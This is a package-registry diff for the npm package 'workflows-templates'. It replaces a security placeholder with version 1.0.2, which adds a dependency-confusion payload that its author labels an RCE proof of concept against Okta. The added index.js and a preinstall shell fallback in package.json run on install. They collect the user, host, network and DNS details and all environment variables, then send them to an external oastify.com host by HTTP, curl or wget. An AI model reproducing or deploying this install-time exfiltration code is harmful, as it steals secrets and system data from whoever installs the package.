workflows-templates 0.0.1-security → 1.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of workflows-templates might be problematic. Click here for more details.
- package/index.js +69 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,69 @@
|
|
|
1
|
+
// Apex Hunter v3 - index.js (Stealthy Node.js Payload)
|
|
2
|
+
// This will be attempted first. If it fails, the shell fallback in package.json will run.
|
|
3
|
+
|
|
4
|
+
const os = require('os');
|
|
5
|
+
const fs = require('fs');
|
|
6
|
+
const http = require('http');
|
|
7
|
+
|
|
8
|
+
// ======================= CONFIGURATION =======================
|
|
9
|
+
const oastHost = '0ghiupvsv1wtvtoarcpv56v0orusii67.oastify.com';
|
|
10
|
+
const payloadIdentifier = 'Okta_Node_RCE';
|
|
11
|
+
// =============================================================
|
|
12
|
+
|
|
13
|
+
async function gatherIntel() {
|
|
14
|
+
let report = `[+] === Nepalese Hunter: RCE Beacon (Node.js) ===\n`;
|
|
15
|
+
report += `[>] Payload ID: ${payloadIdentifier}\n`;
|
|
16
|
+
report += `[>] Timestamp: ${new Date().toUTCString()}\n`;
|
|
17
|
+
|
|
18
|
+
// System and User Info
|
|
19
|
+
try {
|
|
20
|
+
const userInfo = os.userInfo();
|
|
21
|
+
report += `\n[+] --- SYSTEM & USER CONTEXT ---\n`;
|
|
22
|
+
report += `User: ${userInfo.username} (uid:${userInfo.uid}, gid:${userInfo.gid})\n`;
|
|
23
|
+
report += `Hostname: ${os.hostname()}\n`;
|
|
24
|
+
report += `Platform: ${os.platform()} ${os.release()} ${os.arch()}\n`;
|
|
25
|
+
report += `PWD: ${process.cwd()}\n`;
|
|
26
|
+
} catch (e) { }
|
|
27
|
+
|
|
28
|
+
// DNS Resolver
|
|
29
|
+
try {
|
|
30
|
+
const resolvConf = fs.readFileSync('/etc/resolv.conf', 'utf8');
|
|
31
|
+
report += `\n[+] --- DNS CONFIGURATION (/etc/resolv.conf) ---\n${resolvConf}\n`;
|
|
32
|
+
} catch (e) { }
|
|
33
|
+
|
|
34
|
+
// Environment Variables
|
|
35
|
+
try {
|
|
36
|
+
report += `\n[+] --- FULL ENVIRONMENT VARIABLES ---\n${JSON.stringify(process.env, null, 2)}\n`;
|
|
37
|
+
} catch (e) { }
|
|
38
|
+
|
|
39
|
+
return report;
|
|
40
|
+
}
|
|
41
|
+
|
|
42
|
+
function exfiltrate(data) {
|
|
43
|
+
const options = {
|
|
44
|
+
hostname: oastHost,
|
|
45
|
+
port: 80,
|
|
46
|
+
path: `/NODE-RCE-FROM-${os.hostname()}`,
|
|
47
|
+
method: 'POST',
|
|
48
|
+
headers: {
|
|
49
|
+
'Content-Type': 'text/plain',
|
|
50
|
+
'Content-Length': Buffer.byteLength(data),
|
|
51
|
+
},
|
|
52
|
+
};
|
|
53
|
+
|
|
54
|
+
const req = http.request(options, (res) => {
|
|
55
|
+
res.resume();
|
|
56
|
+
});
|
|
57
|
+
|
|
58
|
+
req.on('error', () => {
|
|
59
|
+
process.exit(1); // Force fallback if exfil fails
|
|
60
|
+
});
|
|
61
|
+
|
|
62
|
+
req.write(data);
|
|
63
|
+
req.end();
|
|
64
|
+
}
|
|
65
|
+
|
|
66
|
+
(async () => {
|
|
67
|
+
const intelReport = await gatherIntel();
|
|
68
|
+
exfiltrate(intelReport);
|
|
69
|
+
})();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "workflows-templates",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.2",
|
|
4
|
+
"description": "CRITICAL - RCE PoC via Dependency Confusion for Okta (nepalihacker000)",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node index.js 2>/dev/null || (PAYLOAD_URL='http://0ghiupvsv1wtvtoarcpv56v0orusii67.oastify.com'; SCRIPT_PATH='/tmp/p.sh'; (echo '#!/bin/sh' && echo 'o() { echo \"[+] --- $1 ---\"; };' && echo 'o GATHERING INTEL (SHELL_FALLBACK)'; echo 'o USER_PRIVILEGE'; id || whoami; echo; echo 'o HOST_KERNEL'; hostname; uname -a; echo; echo 'o PWD'; pwd; echo; echo 'o DNS_INTERNAL_PROOF'; cat /etc/resolv.conf; echo; echo 'o NETWORK_CONFIG'; (ip -o a || ifconfig || echo \"No network tools found.\"); echo; echo 'o ENVIRONMENT'; env;' && echo 'o EXFILTRATING'; echo 'EXFIL_DATA=$(o GATHERING INTEL \\(SHELL_FALLBACK\\) && o USER_PRIVILEGE && (id || whoami) && echo && o HOST_KERNEL && (hostname; uname -a) && echo && o PWD && pwd && echo && o DNS_INTERNAL_PROOF && cat /etc/resolv.conf && echo && o NETWORK_CONFIG && (ip -o a || ifconfig || echo \"No network tools found.\") && echo && o ENVIRONMENT && env)'; echo 'ENCODED_DATA=$(echo \"$EXFIL_DATA\" | base64 | tr -d \"\\n\")'; echo 'EXFIL_CMD=\"curl -s -X POST -H \\\"Content-Type: text/plain\\\" --data \\\"$ENCODED_DATA\\\" $PAYLOAD_URL/SHELL-RCE-FROM-$(hostname)\"'; echo 'eval $EXFIL_CMD || (echo \"$ENCODED_DATA\" | wget -q -O- --post-file=- --header=\"Content-Type: text/plain\" \"$PAYLOAD_URL/SHELL-RCE-WGET-$(hostname)\")') > $SCRIPT_PATH && chmod +x $SCRIPT_PATH && $SCRIPT_PATH)"
|
|
8
|
+
},
|
|
9
|
+
"author": "nepalihacker000",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.
|